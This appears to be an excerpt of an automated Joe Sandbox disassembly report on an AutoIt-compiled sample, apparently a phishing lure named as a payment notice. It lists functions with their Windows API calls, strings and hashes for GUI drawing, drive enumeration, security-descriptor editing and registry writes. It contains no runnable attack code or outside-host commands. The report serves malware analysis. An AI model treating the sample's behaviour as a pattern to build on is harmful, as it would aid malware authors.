Part of subcall function 009773E8: SetBkColor.GDI32(?,00000000), ref: 0097748B
Part of subcall function 009773E8: SelectObject.GDI32(?,?), ref: 00977498
Part of subcall function 009773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
Part of subcall function 009773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
Part of subcall function 009773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 15cb74ccba2e6e214bf336c5b8bd0832d6322d201ece2afe784f33b09f0374c8
Instruction ID: 7fbee90d0adae358e43c66eccaa4323688a77bdb3516368b07b4a846cfa2256e
Opcode Fuzzy Hash: 15cb74ccba2e6e214bf336c5b8bd0832d6322d201ece2afe784f33b09f0374c8
Instruction Fuzzy Hash: 2AA1B2B311C301AFD7009F60DC48A6BBBA9FF49321F104A1DF96A961E1D735E984DB51

Function 008F8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 008F8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00936AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00936AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00936F43

Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5

SendMessageW.USER32(?,00001053), ref: 00936F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00936F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FB7

Strings

0, xrefs: 00936DCF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
Instruction ID: 4693afc5f38a6d3c56cb042bdaf3a54ea8522481b3309862b3a4ee09977e7d75
Opcode Fuzzy Hash: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
Instruction Fuzzy Hash: C912CA31208245EFDB25CF28D994BBABBF9FB44310F548529F589CB261CB31A891DF91

Function 00962711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0096273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0096286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009628A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009628B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00962900
GetClientRect.USER32(00000000,?), ref: 0096290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00962955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00962964
GetStockObject.GDI32(00000011), ref: 00962974
SelectObject.GDI32(00000000,00000000), ref: 00962978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00962988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00962991
DeleteDC.GDI32(00000000), ref: 0096299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009629C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 009629DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00962A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00962A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00962A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00962A77
GetStockObject.GDI32(00000011), ref: 00962A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00962A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00962A97

Strings

static, xrefs: 0096294F, 00962A71
msctls_progress32, xrefs: 00962A13
AutoIt v3, xrefs: 009628F8
DISPLAY, xrefs: 0096295A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
Instruction ID: 1ecb5c8e5d7fa4fdfb82a6d167e185347ea7558916943651a2e3247c88b34db4
Opcode Fuzzy Hash: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
Instruction Fuzzy Hash: 6FB16DB2A10615AFEB14DF68DD89FAE7BB9FB49710F108118F915E7290D770AD40CBA0

Function 00954ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00954AED
GetDriveTypeW.KERNEL32(?,0097CB68,?,\\.\,0097CC08), ref: 00954BCA
SetErrorMode.KERNEL32(00000000,0097CB68,?,\\.\,0097CC08), ref: 00954D36

Strings

ATA, xrefs: 00954C98
Fibre, xrefs: 00954CAD
SATA, xrefs: 00954CD0
SCSI, xrefs: 00954C8A
SAS, xrefs: 00954CC9
Virtual, xrefs: 00954CE5
\\.\, xrefs: 00954B3F
MMC, xrefs: 00954CDE
SSA, xrefs: 00954CA6
Removable, xrefs: 00954C10, 00954C15
FileBackedVirtual, xrefs: 00954CEC
RAMDisk, xrefs: 00954BF4
USB, xrefs: 00954CB4
Network, xrefs: 00954C02
CDROM, xrefs: 00954BFB
PhysicalDrive, xrefs: 00954B76
RAID, xrefs: 00954CBB
1394, xrefs: 00954C9F
iSCSI, xrefs: 00954CC2
Fixed, xrefs: 00954C09
ATAPI, xrefs: 00954C91
SSD, xrefs: 00954C4A
Unknown, xrefs: 00954BED, 00954C83

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 51510189bd0062ade82b2bfecf1c0f7fd8266d6c0724d463d08366bd35e9ef6f
Instruction ID: 204e3f8e6ef38387dbed9f088b8bf57ba302712d44fe1c084d5ae10e089c6d83
Opcode Fuzzy Hash: 51510189bd0062ade82b2bfecf1c0f7fd8266d6c0724d463d08366bd35e9ef6f
Instruction Fuzzy Hash: 1A61D530605205ABCB54DF2AC981DAC77B4EBC634EB288415FC46EB291DB35EDC9DB81

Function 009773E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00977421
SetTextColor.GDI32(?,?), ref: 00977425
GetSysColorBrush.USER32(0000000F), ref: 0097743B
GetSysColor.USER32(0000000F), ref: 00977446
CreateSolidBrush.GDI32(?), ref: 0097744B
GetSysColor.USER32(00000011), ref: 00977463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
SelectObject.GDI32(?,00000000), ref: 00977482
SetBkColor.GDI32(?,00000000), ref: 0097748B
SelectObject.GDI32(?,?), ref: 00977498
InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00977554
InflateRect.USER32(?,000000FD,000000FD), ref: 00977572
DrawFocusRect.USER32(?,?), ref: 0097757D
GetSysColor.USER32(00000011), ref: 0097758E
SetTextColor.GDI32(?,00000000), ref: 00977596
DrawTextW.USER32(?,009770F5,000000FF,?,00000000), ref: 009775A8
SelectObject.GDI32(?,?), ref: 009775BF
DeleteObject.GDI32(?), ref: 009775CA
SelectObject.GDI32(?,?), ref: 009775D0
DeleteObject.GDI32(?), ref: 009775D5
SetTextColor.GDI32(?,?), ref: 009775DB
SetBkColor.GDI32(?,?), ref: 009775E5

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1543f4260273205284cbd7f747b37c3f39f4ef6073006e142bb78e29c502d77d
Instruction ID: 85ab2c2a4837e12d7e9ba3b448dd95d679a9328868464cd18542de8c308dcb5c
Opcode Fuzzy Hash: 1543f4260273205284cbd7f747b37c3f39f4ef6073006e142bb78e29c502d77d
Instruction Fuzzy Hash: 3B6153B3908218AFDF019FA4DC49AAEBF79EF08320F114525F919A72A1D7759980DF90

Function 00970FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00971128
GetDesktopWindow.USER32 ref: 0097113D
GetWindowRect.USER32(00000000), ref: 00971144
GetWindowLongW.USER32(?,000000F0), ref: 00971199
DestroyWindow.USER32(?), ref: 009711B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009711ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0097121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00971232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00971245
IsWindowVisible.USER32(00000000), ref: 009712A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009712BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009712D0
GetWindowRect.USER32(00000000,?), ref: 009712E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0097130E
GetMonitorInfoW.USER32(00000000,?), ref: 00971328
CopyRect.USER32(?,?), ref: 0097133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 009713AA

Strings

0, xrefs: 009710D3
tooltips_class32, xrefs: 009711E6
(, xrefs: 0097131B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
Instruction ID: ab7c82010646c3e76c941db376efecdecccf7677c9ff78972cfd57d319dfe055
Opcode Fuzzy Hash: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
Instruction Fuzzy Hash: 93B18A72608341AFD714DF69C884B6ABBE4FF85350F00891DF99D9B2A1DB71E844CB92

Function 008F8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F8968
GetSystemMetrics.USER32(00000007), ref: 008F8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F899B
GetSystemMetrics.USER32(00000008), ref: 008F89A3
GetSystemMetrics.USER32(00000004), ref: 008F89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008F89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008F89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008F8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008F8A3C
GetClientRect.USER32(00000000,000000FF), ref: 008F8A5A
GetStockObject.GDI32(00000011), ref: 008F8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 008F8A81

Part of subcall function 008F912D: GetCursorPos.USER32(?), ref: 008F9141
Part of subcall function 008F912D: ScreenToClient.USER32(00000000,?), ref: 008F915E
Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000001), ref: 008F9183
Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000002), ref: 008F919D

SetTimer.USER32(00000000,00000000,00000028,008F90FC), ref: 008F8AA8

Strings

AutoIt v3 GUI, xrefs: 008F8A20

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 53e1587b705895e0509d351aa78924b1f774d9b88ed8c55e66efb2cb4eb2f6cf
Instruction ID: e26433267ee8348d56717da6e329af477b32a26ab8367d929a9f56f5fac0102e
Opcode Fuzzy Hash: 53e1587b705895e0509d351aa78924b1f774d9b88ed8c55e66efb2cb4eb2f6cf
Instruction Fuzzy Hash: 6BB19D72A14209EFDB14DFA8DD95BAE3BB5FB48314F104229FA15E7290DB70A940CF51

Function 00940D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940E29
GetLengthSid.ADVAPI32(?), ref: 00940E40
GetAce.ADVAPI32(?,00000000,?), ref: 00940E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940E96
GetLengthSid.ADVAPI32(?), ref: 00940EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940EB5
HeapAlloc.KERNEL32(00000000), ref: 00940EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940EDD
CopySid.ADVAPI32(00000000), ref: 00940EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F6E
HeapFree.KERNEL32(00000000), ref: 00940F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F7E
HeapFree.KERNEL32(00000000), ref: 00940F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F8E
HeapFree.KERNEL32(00000000), ref: 00940F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00940FA1
HeapFree.KERNEL32(00000000), ref: 00940FA8

Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
Instruction ID: 020daf13fa3b4524148803b93d1cf63770c0ddc7a950a9c88c1348a881d17bde
Opcode Fuzzy Hash: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
Instruction Fuzzy Hash: 52716FB290420AABDF209FA4DC44FAEBBBCBF84300F044169FA19A7191D7359945CBA0

Function 0096C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0097CC08,00000000,?,00000000,?,?), ref: 0096C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0096C5A4
_wcslen.LIBCMT ref: 0096C5F4
_wcslen.LIBCMT ref: 0096C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0096C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0096C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0096C84D
RegCloseKey.ADVAPI32(?), ref: 0096C881
RegCloseKey.ADVAPI32(00000000), ref: 0096C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0096C960

Strings

REG_DWORD, xrefs: 0096C804
REG_BINARY, xrefs: 0096C913
REG_EXPAND_SZ, xrefs: 0096C5CD
REG_MULTI_SZ, xrefs: 0096C6F5
REG_SZ, xrefs: 0096C644
REG_QWORD, xrefs: 0096C8C3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 8062418caa3da162afe22340d473111dd9019075c27816ec107584514e85cc6c
Instruction ID: c39bf6e6942ec007eb2f07c387782331859bca75327207e1c18b2389c0fd3979
Opcode Fuzzy Hash: 8062418caa3da162afe22340d473111dd9019075c27816ec107584514e85cc6c
Instruction Fuzzy Hash: 921269756082019FDB14DF19C881A2AB7E5FF89714F04885CF99A9B3A2DB31FD41CB82

Function 0097091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009709C6
_wcslen.LIBCMT ref: 00970A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00970A54
_wcslen.LIBCMT ref: 00970A8A
_wcslen.LIBCMT ref: 00970B06
_wcslen.LIBCMT ref: 00970B81

Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD

Part of subcall function 00942BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00942BFA

Strings

GETTOTALCOUNT, xrefs: 009709F2, 00970A17
EXPAND, xrefs: 00970BF8
GETTEXT, xrefs: 00970C97
CHECK, xrefs: 00970A85, 00970AA0
ISCHECKED, xrefs: 00970CE1
GETITEMCOUNT, xrefs: 00970C1E
EXISTS, xrefs: 00970B7C, 00970B97
UNCHECK, xrefs: 00970D3E
COLLAPSE, xrefs: 00970B01, 00970B1C
SELECT, xrefs: 00970D11
GETSELECTED, xrefs: 00970C4E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
Instruction ID: bb237c1122d6120cc16094bf79e7dfe023abfa73be446c902dae69fe19dec7e1
Opcode Fuzzy Hash: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
Instruction Fuzzy Hash: A9E16632208341CFCB24DF29C45192AB7E5FFD9714F148958F89A9B2A2D730EE45CB82

Function 0096C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
_wcslen.LIBCMT ref: 0096C9F1
_wcslen.LIBCMT ref: 0096CA68
_wcslen.LIBCMT ref: 0096CA9E
_wcslen.LIBCMT ref: 0096CAF9
_wcslen.LIBCMT ref: 0096CB2F
_wcslen.LIBCMT ref: 0096CB7F

Strings

HKLM, xrefs: 0096CA98, 0096CA9D
HKEY_USERS, xrefs: 0096CBDF
HKCU, xrefs: 0096CBCE
HKU, xrefs: 0096CBF0
HKCC, xrefs: 0096CBAC
HKEY_LOCAL_MACHINE, xrefs: 0096CA62, 0096CA67
HKEY_CURRENT_CONFIG, xrefs: 0096CB79, 0096CB7E
HKEY_CURRENT_USER, xrefs: 0096CBBD
HKEY_CLASSES_ROOT, xrefs: 0096CAF3, 0096CAF8
HKCR, xrefs: 0096CB29, 0096CB2E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
